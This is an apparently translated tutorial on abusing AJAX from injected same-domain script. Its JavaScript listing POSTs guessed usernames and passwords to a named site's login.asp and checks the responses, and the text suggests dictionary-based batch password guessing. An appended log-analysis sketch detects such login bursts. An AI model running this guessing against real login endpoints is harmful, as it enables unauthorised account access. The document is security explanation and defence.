This article gives a detailed explanation of how AJAX injection is used. What precautions apply when AJAX injection is possible? The following is a practical case; let's take a look.
AJAX allows data to be processed silently in the background. If there is a way to get your JS script into the same domain as the AJAX module, you can use this XSS to complete a secondary attack, and you can judge whether the returned result is correct through the status attribute of the XHR object. A GET-type AJAX request carries the constructed parameter values directly in the URL; a POST-type AJAX request carries the constructed parameter values in the send method of the XHR object.
Generally, attacks using AJAX are difficult for users to detect unless we want them to be detected. The Firebug plug-in for Firefox can analyze all XHR actions.
How do you security-test modular AJAX web programs in the local domain?
Although AJAX cannot directly transfer data across domains, you can exchange data with the target AJAX module in the local domain. Let's do an experiment with my To Do/Project, using the following code:
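// XHR object used below; its creation is not shown in the original listing.
var _x = new XMLHttpRequest();
alert(_x);

function check_login() {
    // Credentials under test, sent as "up=<username>|<password>".
    var up = "up=" + escape('余弦') + "|" + "1234567";
    _x.open("POST", "http://www.0x37.com/Project/login.asp", true);
    _x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    _x.onreadystatechange = function () {
        // readyState 4: the request has completed.
        if (_x.readyState == 4) {
            if (_x.status == 200) {
                // The response body shows whether the login succeeded.
                alert(_x.responseText);
            }
        }
    };
    _x.send(up);
}
check_login();
//logout();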
After this code is submitted in the local domain, it communicates with the login.asp file on the 0x37 Project. Its function is to guess the user name and password and to judge from the return value whether the guess is correct. With a dictionary, passwords can be guessed in batches. To the server this communication looks normal: the malicious values we constructed are injected through the AJAX channel itself. Of course, we can also test the target URL used by the AJAX module directly. Although AJAX "hides" many server-side files, this does not mean that these server-side files are safe, and they may expose more serious problems.
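A detection sketch for the batch guessing described above, added here and not part of the original article. Because every attempt returns status 200 and the result is only in the response body, the detector ignores status codes and counts POSTs per client to the login endpoint in a sliding window; the log format, IP addresses, index.asp path, window and threshold are constructed assumptions.

```javascript
// Constructed sample access log: "<ISO time> <client IP> <method> <path> <status>".
// Every login attempt answers 200, so the status column cannot separate
// failed guesses from successful logins.
const SAMPLE_LOG = [
  "2024-05-01T10:00:00Z 198.51.100.20 POST /Project/login.asp 200",
  "2024-05-01T10:00:01Z 198.51.100.20 GET /Project/index.asp 200",
  "not a log line",
  "2024-05-01T10:07:30Z 198.51.100.20 POST /Project/login.asp 200",
  // Burst: six POSTs, two seconds apart, from one client.
  ...[0, 2, 4, 6, 8, 10].map((s) =>
    `2024-05-01T10:05:${String(s).padStart(2, "0")}Z 203.0.113.7 POST /Project/login.asp 200`),
];

function parseLine(line) {
  const m = /^(\S+) (\S+) (\S+) (\S+) (\d{3})$/.exec(line.trim());
  if (!m) return null; // skip malformed lines
  const time = Date.parse(m[1]);
  if (Number.isNaN(time)) return null;
  return { time, ip: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Flag clients that send at least `threshold` POSTs to `path` within any
// sliding window of `windowMs` milliseconds.
function findGuessingClients(lines, { path, windowMs, threshold }) {
  const byIp = new Map();
  for (const line of lines) {
    const e = parseLine(line);
    if (!e || e.method !== "POST" || e.path !== path) continue;
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e.time);
  }
  const flagged = [];
  for (const [ip, times] of byIp) {
    times.sort((a, b) => a - b);
    let start = 0;
    let peak = 0; // largest number of attempts seen in one window
    for (let end = 0; end < times.length; end++) {
      while (times[end] - times[start] > windowMs) start++;
      peak = Math.max(peak, end - start + 1);
    }
    if (peak >= threshold) flagged.push({ ip, peak, total: times.length });
  }
  return flagged.sort((a, b) => b.peak - a.peak);
}

console.log(findGuessingClients(SAMPLE_LOG,
  { path: "/Project/login.asp", windowMs: 10000, threshold: 5 }));
```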